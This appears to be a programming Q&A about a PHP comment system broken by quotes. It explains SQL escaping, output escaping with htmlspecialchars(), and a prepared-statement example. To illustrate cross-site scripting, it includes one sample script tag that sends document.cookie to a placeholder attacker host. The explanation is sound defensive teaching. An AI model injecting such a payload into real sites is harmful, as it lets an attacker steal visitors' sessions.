I'm making a comment system on my website. However, a commenter can break the system by typing special characters such as quotes, double quotes, semicolons, colons, etc. This is not a duplicate; I want to make sure that HTML entities are converted before the text gets to the database. I could use str_replace(), but it actually prints the literal code. For example: "
Like this example:
$str ="Hi there bro what's up, im a "MEGA"";
$comment = $str;
echo $comment;
However, it spits out errors, because the quotation marks break the query.
If you're using MySQL and PHP's mysql extension, you have to pass data through the mysql_real_escape_string() function.
For example, before inserting into database:
$comment = mysql_real_escape_string($_POST['comment']);
Then, for printing your HTML:
<p><?=htmlspecialchars($Rs['comment'])?></p>
What you have on your site is called a cross-site scripting vulnerability. Any user can inject code like:
Nice site what you have!<script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>
What you will see is just "Nice site what you have!" as a comment, but the attacker can now take over your session.
You have to use the htmlspecialchars() function when outputting user-supplied data. You'd better read more about it.
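The two halves of the answer (protect the query on the way in, escape on the way out) as one added example; this is not code from the question or the answer. It assumes a PDO connection and a `comments(id, body)` table, and uses a PDO prepared statement in place of the mysql_real_escape_string() call the answer mentions:

```php
<?php
// Added example: store a comment and display it safely.
// Assumptions: a PDO connection $pdo and a table comments(id, body).
declare(strict_types=1);

// Constructed sample input, mirroring the question's quotes and the answer's <script> case.
$raw = 'Hi there bro what\'s up, im a "MEGA"; <script>alert(1)</script>';

// Vulnerable pattern (what the question describes): the comment is spliced into
// the SQL text and echoed raw.
//   $sql = "INSERT INTO comments (body) VALUES ('$raw')"; // quotes break the query
//   echo "<p>$raw</p>";                                     // <script> runs for every visitor

// Hardened pattern.
function storeComment(PDO $pdo, string $body): void
{
    // The comment is sent as a bound parameter, never inside the SQL string,
    // so quotes and semicolons cannot change the query. This replaces the
    // mysql_real_escape_string() step from the answer.
    $stmt = $pdo->prepare('INSERT INTO comments (body) VALUES (:body)');
    $stmt->execute([':body' => $body]);
}

function renderComment(string $body): string
{
    // Escape on output. ENT_QUOTES converts both ' and ", so the value is also
    // safe inside HTML attributes; the charset must match the page's encoding.
    return '<p>' . htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

$pdo = new PDO('mysql:host=localhost;dbname=site', 'user', 'password', [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES   => false, // real server-side prepared statements
]);

storeComment($pdo, $raw);

// Read the comment back and render it; the <script> tag arrives as inert text.
$row = $pdo->query('SELECT body FROM comments ORDER BY id DESC LIMIT 1')
           ->fetch(PDO::FETCH_ASSOC);
echo renderComment($row['body']);
```

Escaping is done at output time with the encoding of the page, not before storage, so the database keeps the original text and the same row can later be rendered in a different context (JSON, plain-text e-mail) with the escaping that context needs.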